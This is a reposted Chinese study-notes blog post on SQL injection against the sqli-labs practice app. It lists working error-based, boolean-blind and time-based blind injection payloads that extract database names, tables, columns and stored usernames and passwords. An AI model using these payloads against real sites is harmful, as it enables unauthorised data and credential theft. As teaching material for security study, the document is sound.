WEB安全--高级sql注入，爆错注入，布尔盲注，时间盲注

1.爆错注入

什么情况想能使用报错注入------------页面返回连接错误信息

常用函数

updatexml()
if...floor
extractvalue

1 updatexml(1,concat(0x23,payload,0x23),1)

 

1 在concat查询语句后面添加一个标识符，如0x23
2 updatexml(1,concat(0x23,payload,0x23),1)
3 因为有的时候报错信息会设置长度限制，添加标识符可以避免显示不完全

获取数据库信息

http://10.1.2.5:10631/sqli/Less-1/?id=1' and updatexml(1,concat(0x23,version()),1)--+

获取表名

1 http://10.1.2.5:10631/sqli/Less-1/?id=1' and updatexml(1,concat(23,(select group_concat(table_name) from information_schema.tables where table_schema='security' )),1)--+

获取列名

http://test.com/sqli/Less-1/?id=1' and updatexml(1,concat(23,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+

获取字段内容

http://test.com/sqli/Less-1/?id=1' and updatexml(1,concat(23,(select group_concat(username,password) from users)),1)--+

（2）还有一种爆错注入

1 select count(*),concat(",",(select table_name from information_schema.tables where table_schema=database() limit 0,0),",",floor(rand()*2))ldx from information_schema.tables group by ldx;
2 
3 select count(*),concat(0x22,0x22,database(),0x22,0x22,floor(rand()*2))ldx from information_schema.tables group by ldx
4 
5 select count(*),concat(0x22,0x22,(select table_name from information_schema.tables where table_schema=database() limit 0,0),0x22,0x22,floor(rand()*2))ldx from information_schema.tables group by ldx;
6　
7 and (select 1 from (select count(*),concat(0x22,0x22,(select table_name from information_schema.tables where table_schema=database() limit 0,0),0x22,0x22,floor(rand()*2))ldx from information_schema.tables group by ldx)ldx);
8 
9 http://test.com/sqli/Less-5/?id=1' and(select 1 from (select count(*),concat(0x22,0x22,(select table_name from information_schema.tables where table_schema=database() limit 2,2),0x22,0x22,floor(rand()*2))ldx from information_schema.tables group by ldx)ldx)--+

以下均摘自《代码审计：企业级Web代码安全架构》一书
 1 1.floor()
 2 
 3 select * from test where id=1 and (select 1 from (select 
 4 count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables
 5  group by x)a);
 6 
 7 2.extractvalue()
 8 
 9 select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
10 
11 3.geometrycollection()
12 
13 select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
14 
15 4.exp()
16 
17 select * from test where id=1 and exp(~(select * from(select user())a));
18 
19 5.multipoint()
20 
21 select * from test where id=1 and multipoint((select * from(select * from(select user())a)b))
22 
23 6.polygon()
24 
25 select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
26 
27 7.multipolygon()
28 
29 select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
30 
31 8.linestring()
32 
33 select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
34 
35 9.multilinestring()
36 
37 select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

 

2.布尔盲注

 特点：页面存在异常，但是即无回显也无报错信息利用--------------------只能通过正确与错误两种状态来判断payload是否正确

count()                                                               计算结果集的行数。
length(str)                                                           返回指定字符串的长度
substr(str,pos,len)/substring(str,pos,len)                            返回截取的子字符串。
ascii(str)                                                            返回指定字符串最左侧字符的sacii值。
布尔型盲注核心思想
----------------------------------------------
利用判断语句来证明推测是否正确。
推测正确时，页面正常显示；错误时，页面异常

 

查数据库名长度

1 http://10.1.2.5:10631/sqli/Less-8/?id=1' and (select length(database())>8)--+

求数据库名

1 http://10.1.2.5:10631/sqli/Less-8/?id=1' and ascii(substr(database(),1,1)) > 64%23

求所有表的数量

1 http://10.1.2.5:10631/sqli/Less-8/?id=1' and (select count(table_name) from information_schema.tables where table_schema=database()) = 5 --+

求表名长度

1 http://10.1.2.5:10631/sqli/Less-8/?id=1' and length((select table_name from information_schema.tables where table_schema=database())) = 5 --+

求表名的ascii值

1 http://10.1.2.5:10631/sqli/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 --+

求列的数量

1 http://10.1.2.5:10631/sqli/Less-8/?id=1' and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3 --+

求列名的ascii值

1 http://10.1.2.5:10631/sqli/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1),1,1))=105 --+

求字段的数量

1 http://10.1.2.5:10631/sqli/Less-8/?id=1' and (select count(username) from security.users)=16 --+

求字段内容

1 http://10.1.2.5:10631/sqli/Less-8/?id=1' and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68 --+

3.时间盲注

 

 1 时间型盲注
 2 特点：页面不存在异常，且即无回显也无报错信息
 3 利用：只能利用条件语句结合执行时间的长短来判断payload是否正确
 4 -----------------------------------------------------------------------
 5 if(exp1,exp2,exp3)
 6 如果exp1是True，则执行exp2，否则执行exp3
 7 -----------------------------------------------------------------------
 8 sleep(s)
 9 将程序暂停s秒
10 -----------------------------------------------------------------------
11 时间型盲注核心思想
12 
13 if(payload,sleep(3),1)
14 即payload正确时，程序暂停3秒。否则立刻执行。
15 if(payload,1,sleep(3))
16 即payload正确时，程序立刻执行，否则暂停3秒。

首先闭合    然后判断是否存在时间注入----------直接在if里面插payload 套式子

1 http://10.1.2.5:10631/sqli/Less-10/?id=1" and sleep(5)--+

查数据库名长度

1 http://test.com/sqli/Less-1/?id=1' and if(length(database())=8,sleep(2),1)-- -

求数据库名的ascii值

1 http://test.com/sqli/Less-1/?id=1' and if(ascii(substr(database(),1,1)) =115,sleep(2),1)--+

感觉今天学的东西真的挺多的，幸好有点基础不然懵了，先整理到这把，占坑在补上。先上个ascii码表把。

 看了tony表哥一篇帖子，记下关于时间盲注的新理解

or，and的执行用短位运算符来说明准确简单点.短运算符的精髓：条件一 and 条件二 //当条件一成立，执行条件二条件一 or 条件二 //当条件一不成立，执行条件二

参考连接

 

转载于:https://www.cnblogs.com/hackxf/p/8885786.html